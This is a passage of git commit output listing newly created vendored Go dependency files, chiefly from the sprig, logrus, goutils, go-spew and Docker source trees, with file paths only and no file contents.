 create mode 100644 vendor/github.com/Masterminds/sprig/docs/reflection.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/semver.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/string_slice.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/strings.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/uuid.md
 create mode 100644 vendor/github.com/Masterminds/sprig/example_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/flow_control_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/functions.go
 create mode 100644 vendor/github.com/Masterminds/sprig/functions_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/glide.lock
 create mode 100644 vendor/github.com/Masterminds/sprig/glide.yaml
 create mode 100644 vendor/github.com/Masterminds/sprig/list.go
 create mode 100644 vendor/github.com/Masterminds/sprig/list_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/numeric.go
 create mode 100644 vendor/github.com/Masterminds/sprig/numeric_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/reflect.go
 create mode 100644 vendor/github.com/Masterminds/sprig/reflect_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/regex.go
 create mode 100644 vendor/github.com/Masterminds/sprig/regex_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/semver.go
 create mode 100644 vendor/github.com/Masterminds/sprig/semver_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/strings.go
 create mode 100644 vendor/github.com/Masterminds/sprig/strings_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/.gitignore
 create mode 100644 vendor/github.com/Sirupsen/logrus/.travis.yml
 create mode 100644 vendor/github.com/Sirupsen/logrus/CHANGELOG.md
 create mode 100644 vendor/github.com/Sirupsen/logrus/LICENSE
 create mode 100644 vendor/github.com/Sirupsen/logrus/README.md
 create mode 100644 vendor/github.com/Sirupsen/logrus/alt_exit.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/alt_exit_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/appveyor.yml
 create mode 100644 vendor/github.com/Sirupsen/logrus/doc.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/entry.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/entry_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/example_basic_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/example_hook_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/exported.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/formatter.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/formatter_bench_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/hook_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/hooks.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md
 create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/test/test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/json_formatter.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/json_formatter_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/logger.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/logger_bench_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/logrus.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/logrus_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_bsd.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_linux.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/text_formatter.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/text_formatter_test.go
 create mode 100644 vendor/github.com/Sirupsen/logrus/writer.go
 create mode 100644 vendor/github.com/aokoli/goutils/.travis.yml
 create mode 100644 vendor/github.com/aokoli/goutils/CHANGELOG.md
 create mode 100644 vendor/github.com/aokoli/goutils/LICENSE.txt
 create mode 100644 vendor/github.com/aokoli/goutils/README.md
 create mode 100644 vendor/github.com/aokoli/goutils/appveyor.yml
 create mode 100644 vendor/github.com/aokoli/goutils/randomstringutils.go
 create mode 100644 vendor/github.com/aokoli/goutils/randomstringutils_test.go
 create mode 100644 vendor/github.com/aokoli/goutils/stringutils.go
 create mode 100644 vendor/github.com/aokoli/goutils/stringutils_test.go
 create mode 100644 vendor/github.com/aokoli/goutils/wordutils.go
 create mode 100644 vendor/github.com/aokoli/goutils/wordutils_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/.gitignore
 create mode 100644 vendor/github.com/davecgh/go-spew/.travis.yml
 create mode 100644 vendor/github.com/davecgh/go-spew/LICENSE
 create mode 100644 vendor/github.com/davecgh/go-spew/README.md
 create mode 100644 vendor/github.com/davecgh/go-spew/cov_report.sh
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/bypass.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/common.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/common_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/config.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/doc.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/dump.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/dump_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/example_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/format.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/format_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/internal_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/spew.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/spew_test.go
 create mode 100644 vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go
 create mode 100644 vendor/github.com/davecgh/go-spew/test_coverage.txt
 create mode 100644 vendor/github.com/docker/docker/.dockerignore
 create mode 100644 vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md
 create mode 100644 vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md
 create mode 100644 vendor/github.com/docker/docker/.gitignore
 create mode 100644 vendor/github.com/docker/docker/.mailmap
 create mode 100644 vendor/github.com/docker/docker/AUTHORS
 create mode 100644 vendor/github.com/docker/docker/CHANGELOG.md
 create mode 100644 vendor/github.com/docker/docker/CONTRIBUTING.md
 create mode 100644 vendor/github.com/docker/docker/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.aarch64
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.armhf
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.ppc64le
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.s390x
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.simple
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.solaris
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.windows
 create mode 100644 vendor/github.com/docker/docker/LICENSE
 create mode 100644 vendor/github.com/docker/docker/MAINTAINERS
 create mode 100644 vendor/github.com/docker/docker/Makefile
 create mode 100644 vendor/github.com/docker/docker/NOTICE
 create mode 100644 vendor/github.com/docker/docker/README.md
 create mode 100644 vendor/github.com/docker/docker/ROADMAP.md
 create mode 100644 vendor/github.com/docker/docker/VENDORING.md
 create mode 100644 vendor/github.com/docker/docker/VERSION
 create mode 100644 vendor/github.com/docker/docker/api/README.md
 create mode 100644 vendor/github.com/docker/docker/api/common.go
 create mode 100644 vendor/github.com/docker/docker/api/common_test.go
 create mode 100644 vendor/github.com/docker/docker/api/common_unix.go
 create mode 100644 vendor/github.com/docker/docker/api/common_windows.go
 create mode 100644 vendor/github.com/docker/docker/api/errors/errors.go
 create mode 100644 vendor/github.com/docker/docker/api/fixtures/keyfile
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/decoder.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/errors.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/form.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/form_test.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/cors.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/debug.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/experimental.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/middleware.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/version.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/version_test.go
 create mode 100644 vendor/github.com/docker/docker/api/server/profiler.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/build/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/build/build.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/build/build_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/container/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/container/container.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/container/container_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/container/copy.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/container/exec.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/container/inspect.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/experimental.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/image/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/image/image.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/image/image_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/local.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/network/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/network/filter.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/network/network.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/network/network_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/plugin.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/router.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/cluster.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/system/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/system/system.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/system/system_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/volume.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router_swapper.go
 create mode 100644 vendor/github.com/docker/docker/api/server/server.go
 create mode 100644 vendor/github.com/docker/docker/api/server/server_test.go
 create mode 100644 vendor/github.com/docker/docker/api/swagger-gen.yaml
 create mode 100644 vendor/github.com/docker/docker/api/swagger.yaml
 create mode 100644 vendor/github.com/docker/docker/api/templates/server/operation.gotmpl
 create mode 100644 vendor/github.com/docker/docker/api/types/auth.go
 create mode 100644 vendor/github.com/docker/docker/api/types/backend/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/types/blkiodev/blkio.go
 create mode 100644 vendor/github.com/docker/docker/api/types/client.go
 create mode 100644 vendor/github.com/docker/docker/api/types/configs.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/config.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/container_create.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/container_update.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/container_wait.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/host_config.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go
 create mode 100644 vendor/github.com/docker/docker/api/types/error_response.go
 create mode 100644 vendor/github.com/docker/docker/api/types/events/events.go
 create mode 100644 vendor/github.com/docker/docker/api/types/filters/parse.go
 create mode 100644 vendor/github.com/docker/docker/api/types/filters/parse_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/id_response.go
 create mode 100644 vendor/github.com/docker/docker/api/types/image_summary.go
 create mode 100644 vendor/github.com/docker/docker/api/types/mount/mount.go
 create mode 100644 vendor/github.com/docker/docker/api/types/network/network.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugin.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugin_device.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugin_env.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugin_interface_type.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugin_mount.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugin_responses.go
 create mode 100644 vendor/github.com/docker/docker/api/types/port.go
 create mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference.go
 create mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/registry/authenticate.go
 create mode 100644 vendor/github.com/docker/docker/api/types/registry/registry.go
 create mode 100644 vendor/github.com/docker/docker/api/types/seccomp.go
 create mode 100644 vendor/github.com/docker/docker/api/types/service_update_response.go
 create mode 100644 vendor/github.com/docker/docker/api/types/stats.go
 create mode 100644 vendor/github.com/docker/docker/api/types/strslice/strslice.go
 create mode 100644 vendor/github.com/docker/docker/api/types/strslice/strslice_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/common.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/container.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/network.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/node.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/secret.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/service.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/swarm.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/task.go
 create mode 100644 vendor/github.com/docker/docker/api/types/time/duration_convert.go
 create mode 100644 vendor/github.com/docker/docker/api/types/time/duration_convert_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/time/timestamp.go
 create mode 100644 vendor/github.com/docker/docker/api/types/time/timestamp_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/types.go
 create mode 100644 vendor/github.com/docker/docker/api/types/versions/README.md
 create mode 100644 vendor/github.com/docker/docker/api/types/versions/compare.go
 create mode 100644 vendor/github.com/docker/docker/api/types/versions/compare_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/versions/v1p19/types.go
 create mode 100644 vendor/github.com/docker/docker/api/types/versions/v1p20/types.go
 create mode 100644 vendor/github.com/docker/docker/api/types/volume.go
 create mode 100644 vendor/github.com/docker/docker/api/types/volume/volumes_create.go
 create mode 100644 vendor/github.com/docker/docker/api/types/volume/volumes_list.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder.go
 create mode 100644 vendor/github.com/docker/docker/builder/context.go
 create mode 100644 vendor/github.com/docker/docker/builder/context_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/context_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/context_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/command/command.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/envVarTest
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/utils_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/wordsTest
 create mode 100644 vendor/github.com/docker/docker/builder/dockerignore.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerignore_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/git.go
 create mode 100644 vendor/github.com/docker/docker/builder/remote.go
 create mode 100644 vendor/github.com/docker/docker/builder/remote_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/tarsum.go
 create mode 100644 vendor/github.com/docker/docker/builder/tarsum_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/utils_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/cobra.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/cli.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/commands/commands.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/attach.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/commit.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/cp.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/diff.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/exec.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/exec_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/export.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/hijack.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/kill.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/logs.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/pause.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/port.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/prune.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/ps_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/rename.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/restart.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/rm.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/run.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/start.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_helpers.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/stop.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/top.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/tty.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/unpause.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/update.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/utils.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/container/wait.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/events_utils.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/formatter.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network.go
